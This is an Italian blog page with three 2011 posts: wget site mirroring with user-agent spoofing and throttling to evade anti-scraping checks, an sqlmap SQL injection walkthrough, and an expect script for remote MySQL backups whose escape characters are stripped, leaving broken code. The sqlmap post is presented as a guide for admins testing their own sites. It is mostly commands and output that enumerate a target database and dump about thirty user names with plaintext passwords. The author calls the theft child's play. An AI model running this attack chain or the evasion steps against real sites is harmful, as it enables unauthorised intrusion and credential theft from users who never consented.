11/11/2011
Backup di un sito Web mediante wget
Qualche giorno fa mi è capitato di dover effettuare il backup di un sito Web senza conoscere le credenziali FTP. Fortunatamente si trattava di un sito sprovvisto di codice lato server, quindi per me è stato piuttosto semplice salvarne una copia in locale.
Per fare tale operazione ho utilizzato il mitico wget, ed in particolare il comando:
nightfly@nightbox:~$ wget -r www.siteexample.it
Tutto il contenuto del sito è stato automaticamente salvato nella directory www.siteexample.it.
Devo ammettere però che ho avuto un po' di fortuna. Infatti, non tutti i server Web consentono liberamente il dump dei loro siti (il termine phishing vi dice qualcosa?). Proprio per impedire tale pratica, molto spesso viene implementato un meccanismo di protezione basato sul riconoscimento del client Web: nel caso in cui il server si accorgesse che è wget a richiedere le pagine del sito, risponderà picche.
Tale controllo risulta comunque facilmente aggirabile. Infatti wget consente lo spoofing del client, che può essere impostato manualmente digitando:
nightfly@nightbox:~$ wget -r -U "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" www.siteexample.it
Invece, nel caso in cui i controlli si basassero anche sui tempi che intercorrono tra la visualizzazione di una pagina e quella successiva, oppure sulla velocità di download delle stesse, basterà utilizzare correttamente le flag --wait e --limit-rate:
nightfly@nightbox:~$ wget --wait=30 --limit-rate=10K -r -U "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" www.siteexample.it
Ed il backup del sito è pronto.
A presto.
09:34 Scritto da: nazarenolatella in SO: Linux | Link permanente | Commenti (0) | Segnala | Tag: wget, web, dump, backup, client web, server web, ftp | OKNOtizie | 
Facebook
06/09/2011
Individuare eventuali vulnerabilità SQLi sul nostro sito mediante sqlmap
Premessa
Questa piccola guida ha come scopo principale quello di istruire eventuali sistemisti/DBA/developer su come testare la robustezza del proprio server/applicativo contro gli attacchi basati sull'SQL injection.
sqlmap
Un tool abbastanza semplice da utilizzare per effettuare questo tipo di test prende il nome di sqlmap.
Ecco quali sono gli step che ho seguito per "dumpare" il contenuto di un database mySQL presente dietro un portale Web "bacato":
C:UserseldoDesktopsqlmap>sqlmap.py -u http://vulnsite.it/view_book.php?id=1
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 08:05:07
[08:05:07] [INFO] using 'C:UserseldoDesktopsqlmapoutputvulnsite.itsession' as session file
[08:05:07] [INFO] testing connection to the target url
[08:05:08] [INFO] testing if the url is stable, wait a few seconds
[08:05:10] [INFO] url is stable
[08:05:10] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[08:05:11] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[08:05:11] [INFO] testing if GET parameter 'id' is dynamic
[08:05:12] [INFO] confirming that GET parameter 'id' is dynamic
[08:05:13] [INFO] GET parameter 'id' is dynamic
[08:05:13] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[08:05:13] [INFO] testing unescaped numeric injection on GET parameter 'id'
[08:05:14] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[08:05:14] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 pare
nthesis
[08:05:14] [INFO] testing for parenthesis on injectable parameter
[08:05:16] [INFO] the injectable parameter requires 0 parenthesis
[08:05:16] [INFO] testing MySQL
[08:05:17] [INFO] confirming MySQL
[08:05:18] [INFO] retrieved: 3
[08:05:23] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.3, ASP.NET
back-end DBMS: MySQL >= 5.0.0
[*] shutting down at: 08:05:23
Una volta constatato che il portale è vulnerabile, procedo con l'enumerazione dei DBMS:
C:UserseldoDesktopsqlmap>sqlmap.py -u http://vulnsite.it/view_book.php?id=1 --dbs
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 08:06:20
[08:06:20] [INFO] using 'C:UserseldoDesktopsqlmapoutputs12447-15xnnvzre.ro
ma.coliseumlab.netsession' as session file
[08:06:20] [INFO] resuming match ratio '0.946' from session file
[08:06:20] [INFO] resuming injection point 'GET' from session file
[08:06:20] [INFO] resuming injection parameter 'id' from session file
[08:06:20] [INFO] resuming injection type 'numeric' from session file
[08:06:20] [INFO] resuming 0 number of parenthesis from session file
[08:06:20] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:06:20] [INFO] testing connection to the target url
[08:06:20] [INFO] testing for parenthesis on injectable parameter
[08:06:20] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.3, ASP.NET
back-end DBMS: MySQL 5
[08:06:20] [INFO] fetching database names
[08:06:20] [INFO] fetching number of databases
[08:06:20] [INFO] retrieved: 2
[08:06:25] [INFO] retrieved: information_schema
[08:08:05] [INFO] retrieved: 12447_15_1
available databases [2]:
[*] 12447_15_1
[*] information_schema
[08:09:04] [INFO] Fetched data logged to text files under 'C:UserseldoDesktop
sqlmapoutputvulnsite.it'
[*] shutting down at: 08:09:04
Uso come target il DB 12447_15_1 e procedo con l'enumerazione delle tabelle:
C:UserseldoDesktopsqlmap>sqlmap.py -u http://vulnsite.it/view_book.php?id=1 -D 12447_15_1 --tables
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 08:06:20
[08:12:07] [INFO] using 'C:UserseldoDesktopsqlmapoutputvulnsite.itsession' as session file
[08:12:07] [INFO] resuming match ratio '0.946' from session file
[08:12:07] [INFO] resuming injection point 'GET' from session file
[08:12:07] [INFO] resuming injection parameter 'id' from session file
[08:12:07] [INFO] resuming injection type 'numeric' from session file
[08:12:07] [INFO] resuming 0 number of parenthesis from session file
[08:12:07] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:12:07] [INFO] testing connection to the target url
[08:12:08] [INFO] testing for parenthesis on injectable parameter
[08:12:08] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.3, ASP.NET
back-end DBMS: MySQL 5
[08:12:08] [INFO] fetching tables for database '12447_15_1'
[08:12:08] [INFO] fetching number of tables for database '12447_15_1'
[08:12:08] [INFO] retrieved: 2
[08:12:13] [INFO] retrieved: books
[08:12:41] [INFO] retrieved: club_members
Database: 12447_15_1
[2 tables]
+--------------+
| books |
| club_members |
+--------------+
[08:13:43] [INFO] Fetched data logged to text files under 'C:UserseldoDesktop
sqlmapoutputvulnsite.it'
[*] shutting down at: 08:13:43
Adesso procedo con l'enumerazione delle colonne relative alla tabella club_members:
C:UserseldoDesktopsqlmap>sqlmap.py -u http://vulnsite.it/view_book.php?id=1 -D 12447_15_1 -T club_members --columns
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 08:21:36
[08:21:36] [INFO] using 'C:UserseldoDesktopsqlmapoutputs12447-15xnnvzre.ro
ma.coliseumlab.netsession' as session file
[08:21:36] [INFO] resuming match ratio '0.946' from session file
[08:21:36] [INFO] resuming injection point 'GET' from session file
[08:21:36] [INFO] resuming injection parameter 'id' from session file
[08:21:36] [INFO] resuming injection type 'numeric' from session file
[08:21:36] [INFO] resuming 0 number of parenthesis from session file
[08:21:36] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:21:36] [INFO] testing connection to the target url
[08:21:37] [INFO] testing for parenthesis on injectable parameter
[08:21:37] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.3, ASP.NET
back-end DBMS: MySQL 5
[08:21:37] [INFO] fetching columns for table 'club_members' on database '12447_1
5_1'
[08:21:37] [INFO] fetching number of columns for table 'club_members' on databas
e '12447_15_1'
[08:21:37] [INFO] retrieved: 6
[08:21:42] [INFO] retrieved: id
[08:21:56] [INFO] retrieved: mediumint(8) unsigned
[08:23:46] [INFO] retrieved: name
[08:24:13] [INFO] retrieved: varchar(255)
[08:25:21] [INFO] retrieved: city
[08:25:46] [INFO] retrieved: varchar(50)
[08:26:47] [INFO] retrieved: zip
[08:27:06] [INFO] retrieved: varchar(10)
[08:28:04] [INFO] retrieved: username
[08:28:53] [INFO] retrieved: varchar(255)
[08:29:57] [INFO] retrieved: password
[08:30:47] [INFO] retrieved: varchar(255)
Database: 12447_15_1
Table: club_members
[6 columns]
+----------+-----------------------+
| Column | Type |
+----------+-----------------------+
| city | varchar(50) |
| id | mediumint(8) unsigned |
| name | varchar(255) |
| password | varchar(255) |
| username | varchar(255) |
| zip | varchar(10) |
+----------+-----------------------+
[08:31:51] [INFO] Fetched data logged to text files under 'C:UserseldoDesktop
sqlmapoutputvulnsite.it'
[*] shutting down at: 08:31:51
Infine, poichè ora conosco la struttura della tabella, posso effettuare il dump dei campi che mi interessano, ovvero name e password:
C:UserseldoDesktopsqlmap>sqlmap.py -u http://vulnsite.it/view_book.php?id=1 -D 12447_15_1 -T club_members -C name,password --dump
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 08:39:44
[08:39:44] [INFO] using 'C:UserseldoDesktopsqlmapoutputs12447-15xnnvzre.ro
ma.coliseumlab.netsession' as session file
[08:39:44] [INFO] resuming match ratio '0.946' from session file
[08:39:44] [INFO] resuming injection point 'GET' from session file
[08:39:44] [INFO] resuming injection parameter 'id' from session file
[08:39:44] [INFO] resuming injection type 'numeric' from session file
[08:39:44] [INFO] resuming 0 number of parenthesis from session file
[08:39:44] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:39:44] [INFO] testing connection to the target url
[08:39:45] [INFO] testing for parenthesis on injectable parameter
[08:39:45] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.3, ASP.NET
back-end DBMS: MySQL 5
[08:39:45] [INFO] fetching columns 'name, password' entries for table 'club_memb
ers' on database '12447_15_1'
[08:39:45] [INFO] fetching number of columns 'name, password' entries for table
'club_members' on database '12447_15_1'
[08:39:45] [INFO] read from file 'C:UserseldoDesktopsqlmapoutputs12447-15x
nnvzre.roma.coliseumlab.netsession': 30
[08:39:45] [INFO] retrieved: Ignacia
[08:40:23] [INFO] read from file 'C:UserseldoDesktopsqlmapoutputs12447-15x
nnvzre.roma.coliseumlab.netsession': AYM91SVH8JL
[08:40:23] [INFO] retrieved: Isaac
[08:40:51] [INFO] retrieving the length of query output
[08:40:51] [INFO] retrieved: 11
[08:41:06] [INFO] resumed from file 'C:UserseldoDesktopsqlmapoutputs12447-
15xnnvzre.roma.coliseumlab.netsession': WVJ39RFZ...
[08:41:06] [INFO] retrieving pending 3 query output characters
[08:41:25] [INFO] retrieved: Roth
[08:41:50] [INFO] retrieved: PRK18UOR6YA
[08:42:51] [INFO] retrieved: Laurel
[08:43:24] [INFO] retrieved: RKS21YTS6EV
[08:44:27] [INFO] retrieved: Ina
[08:44:47] [INFO] retrieved: HHQ64HDD7VJ
[08:45:50] [INFO] retrieved: Samantha
[08:46:33] [INFO] retrieved: BAA37FRB5IR
[08:47:30] [INFO] retrieved: Walter
[08:48:04] [INFO] retrieved: AQD75ZVP9WA
[08:49:02] [INFO] retrieved: Petra
[08:49:31] [INFO] retrieved: BAI67DMT7PN
[08:50:29] [INFO] retrieved: Fleur
[08:50:58] [INFO] retrieved: PJE89BUA1DP
[08:51:58] [INFO] retrieved: Rowan
[08:52:30] [INFO] retrieved: FCY82VKV1PS
[08:53:29] [INFO] retrieved: Cairo
[08:53:59] [INFO] retrieved: GGT75OJT6IO
[08:54:57] [INFO] retrieved: Ruud
[08:55:23] [INFO] retrieved: 166648
[08:55:58] [INFO] retrieved: Cheryl
[08:56:33] [INFO] retrieved: WJI80JKK9XQ
[08:57:30] [INFO] retrieved: Olivia
[08:58:03] [INFO] retrieved: PMO19LFU8OP
[08:59:00] [INFO] retrieved: Sara
[08:59:24] [INFO] retrieved: UHE33ZHA4VD
[09:00:22] [INFO] retrieved: Hermione
[09:01:04] [INFO] retrieved: AHW26AKK3PT
[09:02:01] [INFO] retrieved: Jingo
[09:02:30] [INFO] retrieved: KFV13NWK8SR
[09:03:27] [INFO] retrieved: Ingrid
[09:04:01] [INFO] retrieved: GSR33YLT1GY
[09:04:59] [INFO] retrieved: Kay
[09:05:19] [INFO] retrieved: MZO03VPQ5GA
[09:06:17] [INFO] retrieved: Stone
[09:06:47] [INFO] retrieved: JCD09KIK3XN
[09:07:46] [INFO] retrieved: Quinn
[09:08:15] [INFO] retrieved: IRC74DPU2TU
[09:09:13] [INFO] retrieved: Castor
[09:09:48] [INFO] retrieved: DCA08WQE5SW
[09:10:46] [INFO] retrieved: Wyoming
[09:11:25] [INFO] retrieved: XFL08LPA5QA
[09:12:24] [INFO] retrieved: Harlan
[09:12:58] [INFO] retrieved: HOO93MSH6EK
Per fortuna le password sono salvate in chiaro (e non sottoforma di HASH), dunque "rubarle" è stato un gioco da ragazzi.
Fine del post, a presto.
15:44 Scritto da: nazarenolatella in Sicurezza | Link permanente | Commenti (0) | Segnala | Tag: sqldump, get, post, vuln, sqli, sql injection, dump, id | OKNOtizie | Facebook
25/07/2011
Script per il backup giornaliero di un database remoto
Visto che la ridondanza non è mai troppa (Murphy vi dice qualcosa?), ho pensato di realizzare uno script per effettuare il backup di un database hostato su un server remoto.
Ecco lo script (basato su expect):
#!/usr/bin/expect -f
set date [exec date +%d_%m_%y]
set password1 "<pass1>"
set password2 "<pass2>"
set database "<nomedb>"
spawn ssh user@hostname
expect "*?assword:*"
send "$passwordr"
send "r"
expect ":~$"
send "mysqldump $database -u root -ppassvostrodb > $database_$date.plr"
send "$database_$date.pl user@hostname:/home/userr"
expect "*?assword:*"
send "$password2r"
send "r"
expect ":~$"
send "rm database_*r"
expect eof
Lo script in questione si collega via SSH al server remoto, esegue un dump del database per poi copiarlo tramite SCP sul mio server.
Affinchè tale script venga eseguito giornalmente (per la precisione ogni sera alle 22) è necessario editare il file /etc/crontab aggiungendo la seguente direttiva:
00 22 * * * user cd /home/user/ && ./backupremotedb > /dev/null 2>&1
Per ulteriori info contattatemi.
A presto.